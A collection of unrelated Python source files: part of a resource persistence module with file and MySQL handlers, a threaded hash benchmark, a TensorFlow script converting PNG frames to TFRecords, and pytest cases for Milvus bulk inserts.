with self.saveLock:
self.fileHandler.dump(self.resources, temp, self.fileColumns)
common.replace(temp.name, self.config["filename"])
self.echo.out("[File: %s] Resources saved." % self.config["filename"])
def _dumpTimerThread(self):
try:
self._dump()
except:
self.dumpExceptionEvent.set()
self.echo.out("[File: %s] Exception while saving resources." % self.config["filename"], "EXCEPTION")
else:
self.timer = threading.Timer(self.config["savetimedelta"], self._dumpTimerThread)
self.timer.daemon = True
self.timer.start()
@_checkDumpException
def select(self):
return MemoryPersistenceHandler.select(self)
@_checkDumpException
def update(self, resourceKey, status, resourceInfo):
MemoryPersistenceHandler.update(self, resourceKey, status, resourceInfo)
@_checkDumpException
def insert(self, resourcesList):
for resourceID, resourceInfo in resourcesList:
try: MemoryPersistenceHandler.insert(self, [(resourceID, resourceInfo)])
except KeyError: raise KeyError("Cannot insert resource, ID %s already exists in '%s'." % (resourceID, self.config["filename"]))
@_checkDumpException
def count(self):
return MemoryPersistenceHandler.count(self)
@_checkDumpException
def reset(self, status):
return MemoryPersistenceHandler.reset(self, status)
def shutdown(self):
self.timer.cancel()
self._dump()
class RolloverFilePersistenceHandler(FilePersistenceHandler):
"""Load and dump resources from/to files respecting limits of file size and/or number of resources per file.
This handler uses multiple instances of :class:`FilePersistenceHandler` to allow insertion of new resources respecting limits specified by the user. It is also capable of reading and updating resources from multiple files.
The rollover handler leaves the low level details of persistence for the file handlers attached to each file, taking care of the coordination necessary to maintain consistency between them and also of the verification of limits established.
When inserting new resources, every time the file size limit and/or number of resources per file limit is reached rollover handler opens a new file and assigns a new instance of :class:`FilePersistenceHandler` to handle it. All resources, however, are maintained in memory. So, as in the case of :class:`FilePersistenceHandler`, this handler is not well suited for large datasets that cannot be completely fitted in memory.
.. note::
This handler was inspired by Python's :class:`python:logging.handlers.RotatingFileHandler` class.
"""
def __init__(self, configurationsDictionary):
self.originalConfig = deepcopy(configurationsDictionary)
MemoryPersistenceHandler.__init__(self, configurationsDictionary)
self._setFileHandler()
self.fileHandlersList = []
self.nextSuffixNumber = 1
self.insertHandlerIndex = 0
self.insertSize = -1
self.insertAmount = -1
# Iterate over old rollover files to get file names and max suffix number already used
fileNamesList = [self.config["filename"]]
for name in glob.iglob(self.config["filename"] + ".*"):
if re.search("\.[0-9]+$", name):
fileNamesList.append(name)
suffixNumber = int(name.rsplit(".", 1)[1])
if (suffixNumber >= self.nextSuffixNumber): self.nextSuffixNumber = suffixNumber + 1
# Initialize file persistence handlers
for fileName in fileNamesList: self._addHandler(fileName)
# Get initial file size and amount
if (self.config["sizethreshold"]): self.insertSize = os.path.getsize(self.config["filename"])
if (self.config["amountthreshold"]): self.insertAmount = len(self.fileHandlersList[self.insertHandlerIndex].resources)
def _extractConfig(self, configurationsDictionary):
FilePersistenceHandler._extractConfig(self, configurationsDictionary)
if ("sizethreshold" not in self.config): self.config["sizethreshold"] = 0
else: self.config["sizethreshold"] = int(self.config["sizethreshold"])
if ("amountthreshold" not in self.config): self.config["amountthreshold"] = 0
else: self.config["amountthreshold"] = int(self.config["amountthreshold"])
if (self.config["sizethreshold"] < 0): raise ValueError("Parameter 'sizethreshold' must be zero or greater.")
if (self.config["amountthreshold"] < 0): raise ValueError("Parameter 'amountthreshold' must be zero or greater.")
if (self.config["sizethreshold"] == 0) and (self.config["amountthreshold"] == 0):
raise ValueError("Parameters 'sizethreshold' and 'amountthreshold' cannot be zero at the same time.")
def _addHandler(self, fileName):
config = deepcopy(self.originalConfig)
config["filename"] = fileName
config["filetype"] = self.config["filetype"]
handler = FilePersistenceHandler(config)
if (self.config["uniqueresourceid"]):
duplicated = set(handler.IDsHash).intersection(self.IDsHash)
if (not duplicated): self.IDsHash.update(dict.fromkeys(handler.IDsHash, len(self.fileHandlersList)))
else:
details = ["%s ['%s']" % (resourceID, self.fileHandlersList[self.IDsHash[resourceID]].config["filename"]) for resourceID in duplicated]
raise KeyError("Duplicated ID(s) found in '%s': %s" % (fileName, ", ".join(details)))
self.fileHandlersList.append(handler)
def select(self):
for handlerKey, handler in enumerate(self.fileHandlersList):
(resourceKey, resourceID, resourceInfo) = handler.select()
if (resourceID): return ((handlerKey, resourceKey), resourceID, resourceInfo)
return (None, None, None)
def update(self, keyPair, status, resourceInfo):
self.fileHandlersList[keyPair[0]].update(keyPair[1], status, resourceInfo)
def insert(self, resourcesList):
for resourceID, resourceInfo in resourcesList:
if (self.config["uniqueresourceid"]) and (resourceID in self.IDsHash):
handler = self.fileHandlersList[self.IDsHash[resourceID]]
#try: handler.insert([(resourceID, resourceInfo)])
#except KeyError: raise KeyError("Cannot insert resource, ID %s already exists in file '%s'." % (resourceID, handler.config["filename"]))
handler.insert([(resourceID, resourceInfo)])
continue
with self.insertLock:
handler = self.fileHandlersList[self.insertHandlerIndex]
# Change insert handler if size or amount thresholds were exceeded. If there is no more
# handlers in the list, open a new file and instantiate a new handler to take care of it
while ((self.insertSize >= self.config["sizethreshold"]) or
(self.insertAmount >= self.config["amountthreshold"])):
self.insertHandlerIndex += 1
if (self.insertHandlerIndex >= len(self.fileHandlersList)):
newFileName = "%s.%d" % (self.config["filename"], self.nextSuffixNumber)
with open(newFileName, "w") as file: self.fileHandler.dump([], file, self.fileColumns)
self._addHandler(newFileName)
self.nextSuffixNumber += 1
handler = self.fileHandlersList[self.insertHandlerIndex]
if (self.config["sizethreshold"]): self.insertSize = os.path.getsize(handler.config["filename"])
if (self.config["amountthreshold"]): self.insertAmount = len(handler.resources)
handler.insert([(resourceID, resourceInfo)])
if (self.config["uniqueresourceid"]): self.IDsHash[resourceID] = self.insertHandlerIndex
if (self.config["sizethreshold"]):
self.insertSize += len(self.fileHandler.unparse(handler.resources[-1], self.fileColumns))
if (self.config["amountthreshold"]):
self.insertAmount += 1
def count(self):
counts = [0] * 6
for handler in self.fileHandlersList:
counts = [x + y for x, y in zip(counts, handler.count())]
return counts
def reset(self, status):
for handler in self.fileHandlersList: handler.reset(status)
def shutdown(self):
for handler in self.fileHandlersList: handler.shutdown()
class MySQLPersistenceHandler(BasePersistenceHandler):
"""Store and retrieve resources to/from a MySQL database.
The table must already exist in the database and must contain at least three columns: a primary key column, a resource ID column and a status column.
.. note::
This handler uses `MySQL Connector/Python <http://dev.mysql.com/doc/connector-python/en/index.html>`_ to interact with MySQL databases.
"""
def __init__(self, configurationsDictionary):
BasePersistenceHandler.__init__(self, configurationsDictionary)
self.echo = common.EchoHandler(self.config["echo"])
self.local = threading.local()
self.selectCacheThreadExceptionEvent = threading.Event()
self.selectNoResourcesEvent = threading.Event()
self.selectWaitCondition = threading.Condition()
# Get column names
query = "SELECT * FROM " + self.config["table"] + " LIMIT 0"
connection = mysql.connector.connect(**self.config["connargs"])
cursor = connection.cursor()
cursor.execute(query)
cursor.fetchall()
self.colNames = cursor.column_names
cursor.close()
connection.close()
self.excludedColNames = (self.config["primarykeycolumn"], self.config["resourceidcolumn"], self.config["statuscolumn"])
self.infoColNames = [name for name in self.colNames if (name not in self.excludedColNames)]
# Start select cache thread
self.resourcesQueue = Queue.Queue()
t = threading.Thread(target = self._selectCacheThread)
t.daemon = True
t.start()
with self.selectWaitCondition: self.selectWaitCondition.wait()
def _extractConfig(self, configurationsDictionary):
BasePersistenceHandler._extractConfig(self, configurationsDictionary)
if ("selectcachesize" not in self.config): raise KeyError("Parameter 'selectcachesize' must be specified.")
else: self.config["selectcachesize"] = int(self.config["selectcachesize"])
if ("onduplicateupdate" not in self.config): self.config["onduplicateupdate"] = False
else: self.config["onduplicateupdate"] = common.str2bool(self.config["onduplicateupdate"])
def _selectCacheQuery(self):
query = "SELECT " + self.config["primarykeycolumn"] + " FROM " + self.config["table"] + " WHERE " + self.config["statuscolumn"] + " = %s ORDER BY " + self.config["primarykeycolumn"]
if (self.config["selectcachesize"] > 0): query += " LIMIT %d" % self.config["selectcachesize"]
connection = mysql.connector.connect(**self.config["connargs"])
connection.autocommit = True
cursor = connection.cursor()
cursor.execute(query, (self.status.AVAILABLE,))
resourcesKeys = cursor.fetchall()
cursor.close()
connection.close()
return resourcesKeys
def _selectCacheThread(self):
try:
previouslyEmpty = False
while True:
if not previouslyEmpty: self.echo.out("[Table: %s] Select cache empty. Querying database..." % self.config["table"])
resourcesKeys = self._selectCacheQuery()
if resourcesKeys:
if previouslyEmpty: self.echo.out("[Table: %s] New resources available now." % self.config["table"])
self.selectNoResourcesEvent.clear()
previouslyEmpty = False
self.echo.out("[Table: %s] Filling select cache with resources keys..." % self.config["table"])
for key in resourcesKeys: self.resourcesQueue.put(key[0])
self.echo.out("[Table: %s] Select cache filled." % self.config["table"])
with self.selectWaitCondition: self.selectWaitCondition.notify()
self.resourcesQueue.join()
else:
if not previouslyEmpty: self.echo.out("[Table: %s] No available resources found." % self.config["table"])
self.selectNoResourcesEvent.set()
previouslyEmpty = True
with self.selectWaitCondition:
self.selectWaitCondition.notify()
self.selectWaitCondition.wait()
except:
self.selectCacheThreadExceptionEvent.set()
self.echo.out("[Table: %s] Exception while trying to fill select cache." % self.config["table"], "EXCEPTION")
def setup(self):
self.local.connection = mysql.connector.connect(**self.config["connargs"])
self.local.connection.autocommit = True
def select(self):
# Try to get resource key from select cache
while True:
try:
resourceKey = self.resourcesQueue.get_nowait()
except Queue.Empty:
if self.selectCacheThreadExceptionEvent.is_set():
raise RuntimeError("Exception in select cache thread. Execution of MySQLPersistenceHandler aborted.")
elif self.selectNoResourcesEvent.is_set():
with self.selectWaitCondition: self.selectWaitCondition.notify()
return (None, None, None)
else: break
# Fetch resource information and mark it as being processed
cursor = self.local.connection.cursor(dictionary = True)
query = "UPDATE " + self.config["table"] + " SET " + self.config["statuscolumn"] + " = %s WHERE " + self.config["primarykeycolumn"] + " = %s"
cursor.execute(query, (self.status.INPROGRESS, resourceKey))
self.resourcesQueue.task_done()
query = "SELECT * FROM " + self.config["table"] + " WHERE " + self.config["primarykeycolumn"] + " = %s"
cursor.execute(query, (resourceKey,))
resource = cursor.fetchone()
cursor.close()
return (resource[self.config["primarykeycolumn"]],
resource[self.config["resourceidcolumn"]],
{k: resource[k] for k in self.infoColNames})
def update(self, resourceKey, status, resourceInfo):
cursor = self.local.connection.cursor()
if (not resourceInfo):
query = "UPDATE " + self.config["table"] + " SET " + self.config["statuscolumn"] + " = %s WHERE " + self.config["primarykeycolumn"] + " = %s"
cursor.execute(query, (status, resourceKey))
else:
info = {k: resourceInfo[k] for k in resourceInfo if (k not in self.excludedColNames)}
query = "UPDATE " + self.config["table"] + " SET " + self.config["statuscolumn"] + " = %s, " + " = %s, ".join(info.keys()) + " = %s WHERE " + self.config["primarykeycolumn"] + " = %s"
cursor.execute(query, (status,) + tuple(info.values()) + (resourceKey,))
cursor.close()
def insert(self, resourcesList):
# The method cursor.executemany() is optimized for multiple inserts, batching all data into a single INSERT INTO
# statement. This method would be the best to use here but unfortunately it does not parse the DEFAULT keyword
# correctly. This way, the alternative is to pre-build the query and send it to cursor.execute() instead.
if not resourcesList: return
query = "INSERT INTO " + self.config["table"] + " (" + ", ".join(self.colNames) + ") VALUES "
data = []
values = []
for resourceID, resourceInfo in resourcesList:
newResource = {self.config["resourceidcolumn"]: resourceID}
newResource.update(resourceInfo)
resourceValues = []
for column in self.colNames:
if (column in newResource):
resourceValues.append("%s")
data.append(newResource[column])
else: resourceValues.append("DEFAULT")
values.append("(" + ", ".join(resourceValues) + ")")
query += ", ".join(values)
if (self.config["onduplicateupdate"]):
query += " ON DUPLICATE KEY UPDATE " + ", ".join(["{0} = VALUES({0})".format(column) for column in self.infoColNames])
cursor = self.local.connection.cursor()
cursor.execute(query, data)
cursor.close()
self.selectNoResourcesEvent.clear()
with self.selectWaitCondition: self.selectWaitCondition.notify()
def count(self):
query = "SELECT " + self.config["statuscolumn"] + ", count(*) FROM " + self.config["table"] + " GROUP BY " + self.config["statuscolumn"]
cursor = self.local.connection.cursor()
cursor.execute(query)
result = cursor.fetchall()
cursor.close()
counts = [0, 0, 0, 0, 0, 0]
for row in result:
if (row[0] == self.status.SUCCEEDED): counts[1] = row[1]
elif (row[0] == self.status.INPROGRESS): counts[2] = row[1]
elif (row[0] == self.status.AVAILABLE): counts[3] = row[1]
elif (row[0] == self.status.FAILED): counts[4] = row[1]
elif (row[0] == self.status.ERROR): counts[5] = row[1]
counts[0] += row[1]
return tuple(counts)
def reset(self, status):
query = "UPDATE " + self.config["table"] + " SET " + self.config["statuscolumn"] + " = %s WHERE " + self.config["statuscolumn"] + " = %s"
cursor = self.local.connection.cursor()
cursor.execute(query, (self.status.AVAILABLE, status))
affectedRows = cursor.rowcount
cursor.close()
with self.selectWaitCondition: self.selectWaitCondition.notify()
return affectedRows
def finish(self):
self.local.connection.close()
|
main_threaded.py
|
import datetime
import multiprocessing
from threading import Thread
from model.hash_generator import HashGenerator
QUANTITY = 160
def main():
hash_gen = HashGenerator(difficulty=4)
processor_count = multiprocessing.cpu_count()
threads = []
print(f'\nProcessors count: {processor_count}\n')
t0 = datetime.datetime.now()
for _ in range(processor_count):
threads.append(Thread(target=hash_gen.get_hashes, args=(QUANTITY / processor_count,), daemon=True))
[t.start() for t in threads]
[t.join() for t in threads]
dt = datetime.datetime.now() - t0
print(f'\nDone in {dt.total_seconds():.2f} seconds\n')
if __name__ == '__main__':
main()
|
build_image_data.py
|
"""Converts image data to TFRecords file format with Example protos.
Modified from
https://github.com/tensorflow/models/blob/master/inception/inception/data/build_image_data.py
The image data set is expected to reside in PNG files located in the
following directory structure.
data_dir/video_id/image0.png
data_dir/video_id/image1.png
...
data_dir/video_id/weird-image.png
data_dir/video_id/my-image.png
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/image_raw: string containing PNG encoded image in RGB colorspace
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/notebooks/shared/videos/webcam/frames',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/notebooks/shared/videos/webcam/tfrecords',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 128,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
FLAGS = tf.app.flags.FLAGS
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(image_buffer):
"""Build an Example proto for an example.
Args:
image_buffer: string, PNG encoding of RGB image
Returns:
Example proto
"""
example = tf.train.Example(features=tf.train.Features(feature={
'image_raw': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
self._decode_png = tf.image.decode_png(self._png_data, channels=3)
def decode_png(self, image_data):
image = self._sess.run(self._decode_png,
feed_dict={self._png_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.PNG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, PNG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'r') as f:
image_data = f.read()
# Decode the RGB PNG>
image = coder.decode_png(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
assert height == 360
width = image.shape[1]
assert width == 640
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(image_buffer)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in PNG files located in
the following directory structure.
data_dir/another-image.PNG
data_dir/my-image.PNG
Returns:
filenames: list of strings; each string is a path to an image file.
"""
print('Determining list of input files and labels from %s.' % data_dir)
filenames = []
png_file_path = '{}/*/*.png'.format(data_dir)
matching_files = tf.gfile.Glob(png_file_path)
filenames.extend(matching_files)
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
print('Found %d PNG files inside %s.' % (len(filenames), data_dir))
sys.stdout.flush()
return filenames
def _process_dataset(name, directory, num_shards):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames = _find_image_files(directory)
_process_image_files(name, filenames, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
if tf.gfile.Exists(FLAGS.output_directory):
tf.gfile.DeleteRecursively(FLAGS.output_directory)
tf.gfile.MakeDirs(FLAGS.output_directory)
# Run it!
#_process_dataset('validation', FLAGS.validation_directory, FLAGS.validation_shards)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards)
if __name__ == '__main__':
tf.app.run()
|
test_bulk_insert.py
|
import logging
import time
import pdb
import copy
import threading
from multiprocessing import Pool, Process
import pytest
from milvus import DataType
from utils import *
from constants import *
ADD_TIMEOUT = 60
uid = "test_insert"
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": 10, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("CPU not support index_type: ivf_sq8h")
return request.param
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
def test_add_vector_with_empty_vector(self, connect, collection):
'''
target: test add vectors with empty vectors list
method: set empty vectors list as add method params
expected: raises a Exception
'''
vector = []
with pytest.raises(Exception) as e:
status, ids = connect.bulk_insert(collection, vector)
def test_add_vector_with_None(self, connect, collection):
'''
target: test add vectors with None
method: set None as add method params
expected: raises a Exception
'''
vector = None
with pytest.raises(Exception) as e:
status, ids = connect.bulk_insert(collection, vector)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_collection_not_existed(self, connect):
'''
target: test insert, with collection not existed
method: insert entity into a random named collection
expected: error raised
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.bulk_insert(collection_name, default_entities)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
'''
target: test delete collection after insert vector
method: insert vector and delete collection
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entity)
assert len(ids) == 1
connect.drop_collection(collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_sleep_drop_collection(self, connect, collection):
'''
target: test delete collection after insert vector for a while
method: insert vector, sleep, and delete collection
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entity)
assert len(ids) == 1
connect.flush([collection])
connect.drop_collection(collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
'''
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
info = connect.get_collection_info(collection)
fields = info["fields"]
for field in fields:
if field["name"] == field_name:
assert field["indexes"][0] == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index_new(self, connect, collection, get_simple_index):
'''
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entities_new)
assert len(ids) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
info = connect.get_collection_info(collection)
fields = info["fields"]
for field in fields:
if field["name"] == field_name:
assert field["indexes"][0] == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
'''
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
'''
connect.create_index(collection, field_name, get_simple_index)
ids = connect.bulk_insert(collection, default_entities)
assert len(ids) == default_nb
info = connect.get_collection_info(collection)
fields = info["fields"]
for field in fields:
if field["name"] == field_name:
assert field["indexes"][0] == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_search(self, connect, collection):
'''
target: test search vector after insert vector after a while
method: insert vector, sleep, and search collection
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entities)
connect.flush([collection])
res = connect.search(collection, default_single_query)
logging.getLogger().debug(res)
assert res
def test_insert_segment_row_count(self, connect, collection):
nb = default_segment_row_limit + 1
res_ids = connect.bulk_insert(collection, gen_entities(nb))
connect.flush([collection])
assert len(res_ids) == nb
stats = connect.get_collection_stats(collection)
assert len(stats['partitions'][0]['segments']) == 2
for segment in stats['partitions'][0]['segments']:
assert segment['row_count'] in [default_segment_row_limit, 1]
@pytest.fixture(
scope="function",
params=[
1,
2000
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids(self, connect, id_collection, insert_count):
'''
target: test insert vectors in collection, use customize ids
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the length of ids and the collection row count
'''
nb = insert_count
ids = [i for i in range(nb)]
res_ids = connect.bulk_insert(id_collection, gen_entities(nb), ids)
connect.flush([id_collection])
assert len(res_ids) == nb
assert res_ids == ids
res_count = connect.count_entities(id_collection)
assert res_count == nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
'''
target: test insert vectors in collection, use customize the same ids
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the length of ids and the collection row count
'''
nb = insert_count
ids = [1 for i in range(nb)]
res_ids = connect.bulk_insert(id_collection, gen_entities(nb), ids)
connect.flush([id_collection])
assert len(res_ids) == nb
assert res_ids == ids
res_count = connect.count_entities(id_collection)
assert res_count == nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
'''
target: test create normal collection with different fields, insert entities into id with ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
'''
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str("test_collection")
fields = {
"fields": [filter_field, vector_field],
"segment_row_limit": default_segment_row_limit,
"auto_id": True
}
connect.create_collection(collection_name, fields)
ids = [i for i in range(nb)]
entities = gen_entities_by_fields(fields["fields"], nb, default_dim)
res_ids = connect.bulk_insert(collection_name, entities, ids)
assert res_ids == ids
connect.flush([collection_name])
res_count = connect.count_entities(collection_name)
assert res_count == nb
# TODO: assert exception && enable
@pytest.mark.level(2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
'''
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use customize ids first, and then use no ids
expected: error raised
'''
ids = [i for i in range(default_nb)]
res_ids = connect.bulk_insert(id_collection, default_entities, ids)
with pytest.raises(Exception) as e:
res_ids_new = connect.bulk_insert(id_collection, default_entities)
# TODO: assert exception && enable
@pytest.mark.level(2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_twice_not_ids_ids(self, connect, id_collection):
'''
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use not ids first, and then use customize ids
expected: error raised
'''
with pytest.raises(Exception) as e:
res_ids = connect.bulk_insert(id_collection, default_entities)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
'''
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
'''
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
with pytest.raises(Exception) as e:
res_ids = connect.bulk_insert(id_collection, default_entities, ids)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, collection):
'''
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
'''
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
with pytest.raises(Exception) as e:
res_ids = connect.bulk_insert(collection, default_entity, ids)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
'''
target: test create normal collection with different fields, insert entities into id without ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
'''
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str("test_collection")
fields = {
"fields": [filter_field, vector_field],
"segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
entities = gen_entities_by_fields(fields["fields"], nb, default_dim)
res_ids = connect.bulk_insert(collection_name, entities)
connect.flush([collection_name])
res_count = connect.count_entities(collection_name)
assert res_count == nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it, with the partition_tag param
expected: the collection row count equals to nq
'''
connect.create_partition(collection, default_tag)
ids = connect.bulk_insert(collection, default_entities, partition_tag=default_tag)
assert len(ids) == default_nb
assert connect.has_partition(collection, default_tag)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag_with_ids(self, connect, id_collection):
'''
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_tag param
expected: the collection row count equals to nq
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
res_ids = connect.bulk_insert(id_collection, default_entities, ids, partition_tag=default_tag)
assert res_ids == ids
@pytest.mark.timeout(ADD_TIMEOUT)
